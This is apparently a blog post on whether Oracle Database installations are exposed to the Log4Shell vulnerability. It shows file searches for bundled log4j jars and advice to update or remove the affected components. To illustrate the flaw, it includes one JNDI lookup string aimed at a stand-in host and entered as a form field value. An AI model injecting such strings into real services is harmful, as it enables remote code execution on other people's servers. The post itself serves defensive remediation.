Log4J and Oracle Database

CVE-2021-44228 issue allows an user without authentication to execute code. It is tremendously easy to exploit, it is more a working-as-designed feature than a hard-core memory glitch.

Log4j is a logging library for java. If you enter some unexpected string, your web server may log it to a logfile.

  • What’s your name?
  • John
  • What’s your age?
  • 1000
  • Come on, that’s not possible
2021-01-05 John says he's 1000

So far so good. But one log4j developer probably found useful to add variable expansion and the like

  • What’s your name?
  • John
  • What’s your age?
  • ${JNDI:ldaps://example.com/rm-rf-*}
  • Come on, that’s not possible
2021-01-05 John says he's 1m files removed

Server attacked. This is of course best if multiple flaws exist, there is no firewalls and the web server logs everything with log4j.

Anyway, it isn’t a good feeling to be at risk.

It requires some carefull reading to check if Oracle Database is affected.

One may have check Oracle Support doc 2828877.1:

Oracle Database (all supported versions including 11.2, 12.1, 12.2, 19c, and 21c) are not affected by vulnerability CVE-2021-44228 or CVE-2021-45046.

But the innocent reader may stop here.

Let’s check some software, for instance RDBMS 19.6

$ find . -name "log4j-core*.jar"
./suptools/tfa/release/tfa_home/jlib/log4j-core-2.9.1.jar
./md/property_graph/lib/log4j-core-2.11.0.jar

What??? Is this not log4j around?

Other notes will tell CVE-2021-45105, CVE-2021-44228 and CVE-2021-45046 are addressed in AHF Version 21.4

$ suptools/tfa/release/tfa_home/bin/tfactl version
/oracle/suptools/tfa/release/tfa_home/bin
TFA Version : 183300
TFA Build ID : 20190315044534

So there I am at risk.

  • WARNING: removing TFA prevents autopatch from patching

Two solutions : update TFA, if you need it or remove it with

tfactl uninstall

(rm will also do)

What does Oracle says about md ?

Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45104, and CVE-2021-45105 concern Spatial in versions 12.2, 18.x, and 21.x. 

If you use Spatial, then patch it. Otherwise, Oracle recommends to remove the whole md/property_graph directory (doc 2652121.1)

rm md/property_graph

12.1 (also client) has a few log4j-core jars, but version 1.x, which is older and less critical. But due to the log4j hystery, you may want to remove some of those, like $ORACLE_HOME/oui/jlib/jlib/log4j-core.

$ unzip -p -l oui/jlib/jlib/log4j-core.jar META-INF/MANIFEST.MF|grep Implementation-Version
Implementation-Version: 1.1.1

Minimizing the impact of log4j is one thing, but pretending we’re unaffected isn’t really helpful.

1 thought on “Log4J and Oracle Database

  1. Laurent Schneider Post author

    One of those days, your secadmin will scan your server for old log4j classes, better remove yours now to avoid negative visibility

Leave a Reply

Your email address will not be published.